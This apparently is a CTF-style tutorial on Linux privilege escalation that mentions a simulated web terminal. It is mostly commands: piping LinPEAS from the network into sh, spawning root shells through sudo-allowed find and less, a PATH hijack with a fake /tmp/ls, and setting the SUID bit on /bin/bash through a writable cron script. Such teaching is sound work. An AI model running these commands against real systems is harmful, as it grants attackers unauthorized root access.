Privilege escalation involves exploiting misconfigurations or vulnerabilities to move from a low-privileged user (www-data, normal user) to root. It is a critical phase in any real-world intrusion or CTF challenge.
# Download and run LinPEAS directly on target:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shAdministrators often allow users to run specific commands as root without a password. If those commands have subshell features, we can spawn a root shell.
# Check allowed sudo commands:
sudo -l
# (ALL) NOPASSWD: /usr/bin/find
sudo find / -exec /bin/bash \; -quit
# (ALL) NOPASSWD: /usr/bin/less
sudo less /etc/passwd
# inside less, type: !bashI've prepared a web terminal simulating initial access to a Linux machine as user www-data. Enumerate your permissions and exploit them to get root privileges.
SUID binaries execute with the permissions of their owner (usually root). Check GTFOBins for bypasses.
# Find SUID binaries:
find / -perm -4000 -type f 2>/dev/nullIf a SUID binary calls a system command without an absolute path (e.g., ls instead of /bin/ls), we can hijack the PATH variable to execute our own malicious binary as root.
echo '/bin/bash -p' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
./vulnerable_suid_binaryCapabilities are a modern alternative to SUID, granting fragmented root permissions (like network manipulation or file reading) to specific binaries.
# List binaries with capabilities:
getcap -r / 2>/dev/null# System crons:
cat /etc/crontab
# If a cron script is writable by our user:
echo 'chmod +s /bin/bash' >> /path/to/script.sh
/bin/bash -p